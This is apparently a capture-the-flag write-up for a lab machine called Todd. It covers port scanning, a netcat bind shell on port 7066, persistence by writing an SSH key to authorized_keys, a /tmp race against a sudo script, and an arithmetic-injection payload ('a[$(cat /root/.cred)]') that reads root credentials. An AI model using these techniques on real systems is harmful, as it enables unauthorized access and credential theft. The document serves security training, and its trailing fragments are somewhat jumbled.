First port scanning and we get SSH, HTTP, and a lot of unknown services.
nmap -p- 10.10.1.3 -sCV -oA toddnmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.59 ((Debian))
|_http-server-header: Apache/2.4.59 (Debian)
|_http-title: Mindful Listening
1161/tcp open tcpwrapped
7066/tcp open unknown
7185/tcp open tcpwrapped
9204/tcp open tcpwrapped
9486/tcp open tcpwrapped
20927/tcp open tcpwrapped
21276/tcp open tcpwrapped
23009/tcp open tcpwrapped
23959/tcp open tcpwrapped
28859/tcp open tcpwrapped
29364/tcp open tcpwrapped
HTTP
That's a good quote btw. Now we start searching what this site has.
There are tools ready to use on the machine.
fscan: vulnerability scanner
les.sh: Linux privilege escalation auditing tool
linpeas.sh: Linux Privilege Escalation Awesome Script
pspy64: Monitor linux processes without root permissions
Tried to see if there is any file inclusion vulnerability but the site invulnerable to this
Back to the other ports
Since nmap couldn't get anything about the other ports we could banner grap those ports and see what's going on there.
The idea of this box is whenever you port scan the machine it will give you different ports every time except 22,80 and 7066. So seems like we found the bind shell by luck but that's a good thing to add to our notes. Consider Beyond root if you want to illustrate the idea of the machine.
Stable shell
Now we need to get a stable shell. So the best thing is to do it by adding our public key to the authorized_keys on the machine.
First, we create SSH key pairs and then copy id_rsa.pub to authorized_keys on Todd's SSH directory
-> our machine
ssh-keygen -t rsa
# I just pressed enter for every step and not a secure practice.
Generating public/private rsa key pair.
Enter file in which to save the key (/home/legend/.ssh/id_rsa):
Enter passphrase for "/home/legend/.ssh/id_rsa" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/legend/.ssh/id_rsa
Your public key has been saved in /home/legend/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:P2YLcVb9b0GLffz9d9id2uPwRFiiAW/j3XW7RWwn4sQ legend@legend
The key's randomart image is:
+---[RSA 3072]----+
| . |
| o. . . |
| =E.ooB|
| o+=.O**|
| S oo.+ B=|
| = . O|
| . = . =B|
| + o *+*|
| . .o+=|
+----[SHA256]-----+
cat .ssh/id_rsa.pub
mkdir .ssh; cd .ssh
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0LUKP3/jLzAdKuvDGArzSQpsigU5bZfpdTLMXFMzUv46TOUlmQlFPEye/QGdIqRHFT17l6A3l+RNb+emXwvZV+VTEWw0aCSuzhv0rfTuiFJBUxZueVaz6UTCw4shKQ+BteGopRtVe6fF9cgtL1bK4/LJ9etOSBB+BfKeDBHgSpcqwAtRNSfGUxK//14lX+/yV5DGnn7srBS6BA65Fwoqttr2G+N2yGtF+sBPM/e1cvL4NYP3dZiB/cS5y3EHUVZfiRsEyU3Js9IeheWC+/KmwGId4xxuoGg0YmhVmkNe59w8vhArvUbRITb++QxLFgttCq7pKiXlEeKpjKbPcYTtv/D5Gig1FkKgKSIT3HUqN0PI9HNSZ48F9iHqsxXXKJ6DWhTdYpt7cX9RCva7wQwh14PToxVe27kKvBOLJzxf45khVYz3af2FD3IztWqd+aFrDmFZLCISpVxOrvqsyJAK/QEgJhw8EKg+Isj+F/UwwMxA2Sp8wovTr7NMe2dIETkk= legend@legend' > authorized_keys
ssh todd@10.10.1.3
bash
todd@todd:~$
todd@todd:~$ ls -la
total 32
drwxr-xr-x 3 todd todd 4096 Apr 7 03:23 .
drwxr-xr-x 3 root root 4096 Mar 22 06:53 ..
lrwxrwxrwx 1 root root 9 Mar 22 08:03 .bash_history -> /dev/null
-rw-r--r-- 1 todd todd 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 todd todd 3526 Apr 18 2019 .bashrc
-rw-r--r-- 1 todd todd 263 Apr 7 02:19 index.html
-rw-r--r-- 1 todd todd 807 Apr 18 2019 .profile
drwxr-xr-x 2 todd todd 4096 Apr 7 03:24 .ssh
-rw-r--r-- 1 todd todd 39 Mar 22 06:54 user.txt
todd@todd:~$ sudo -l
Matching Defaults entries for todd on todd:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User todd may run the following commands on todd:
(ALL : ALL) NOPASSWD: /bin/bash /srv/guess_and_check.sh
(ALL : ALL) NOPASSWD: /usr/bin/rm
(ALL : ALL) NOPASSWD: /usr/sbin/reboot
todd@todd:~$ Connection to 10.10.1.3 closed by remote host.
Connection to 10.10.1.3 closed.
and we still get disconnected from the machine and this could be because of kill_todd.sh. We can use sudo rm to delete kill_todd.sh
todd@todd:/opt$ ls -la
total 40
drwxr-xr-x 2 root root 4096 Mar 22 10:40 .
drwxr-xr-x 18 root root 4096 Nov 13 2020 ..
-rwx------ 1 root root 138 Mar 22 08:00 create_nc2.sh
-rwx---r-- 1 root root 141 Mar 22 07:42 create_nc.sh
-rwx------ 1 root root 16608 Mar 22 07:21 fake_ssh
-rwx------ 1 root root 17 Mar 22 07:07 kill_todd.sh
todd@todd:/opt$ sudo /usr/bin/rm kill_todd.sh
and now we have a stable shell and the user flag.
todd@todd:~$ cat user.txt
Todd{*REDACTED*}
#!/bin/bash
# check this script used by human
a=$((RANDOM%1000))
echo "Please Input [$a]"
echo "[+] Check this script used by human."
echo "[+] Please Input Correct Number:"
read -p ">>>" input_number
[[ $input_number -ne "$a" ]] && exit 1
sleep 0.2
true_file="/tmp/$((RANDOM%1000))"
sleep 1
false_file="/tmp/$((RANDOM%1000))"
[[ -f "$true_file" ]] && [[ ! -f "$false_file" ]] && cat /root/.cred || exit 2
This script checks if the user is a human by typing the random number the script will show.
If you are wrong the script will stop
But what if you are right?
the script has 2 new variables true_file and fasle_file. Both are random number files in the /tmp directory.
the script checks if true_file exists and false_file doesn't exist it will give us the root credentials.
From here we need to create files from 1 to 250 and pray that the script will make the false_file above this.
for i in {1..250}; do
touch "$i"
done
make sure you run the script with sudo :(
todd@todd:/tmp$ /bin/bash /srv/guess_and_check.sh
Please Input [718]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>718
cat: /root/.cred: Permission denied
todd@todd:/tmp$ sudo /bin/bash /srv/guess_and_check.sh
Please Input [11]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>11
*REDACTED*
and we have the root's password
todd@todd:/tmp$ su
Password:
root@todd:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@todd:/tmp# cd /root
root@todd:~# cat root.txt
Todd{*REDACTED*}
Beyond root
Hahahaha like 0xdf yes.
Honeypot
This machine creates and kills fake SSH ports every 2 minutes.
We could have noticed this if we scanned the ports a couple of times.
kill_todd.sh
pkill -9 -u todd
fake_ssh: creates a fake SSH connection that when you connect to it either refuses the connection or prints out uname -a
create_nc.sh
#!/bin/bash
create_ssh(){
sudo -u todd nc -e /opt/fake_ssh -lp $1
}
for i in $(seq 10)
do
a=$((RANDOM))
sleep 0.2
create_ssh $a &
done
create_nc2.sh
#!/bin/bash
create_ssh(){
sudo -u todd nc -e /bin/bash -lp $1
}
for i in $(seq 1)
do
a=$((RANDOM))
sleep 0.2
create_ssh 7066 &
done
>>>a[$(id)]
/srv/guess_and_check.sh: line 35: uid=0(root) gid=0(root) groups=0(root): syntax error in expression (error token is "(root) gid=0(root) groups=0(root)")
so we can read /root/.cred
>>>a[$(cat /root/.cred)]
/srv/guess_and_check.sh: line 35: *REDACTED*: syntax error in expression (error token is "*REDACTED*")
Last updated
Was this helpful?
We will use . and lucky us, this machine has it ready for us
Using pkill will terminate all processes for todd.
-9: Signal 9 is also known as SIGKILL and cannot be 'caught' by the underlying process, as such it forces the process to exit. This is generally considered rude but may be necessary. ()
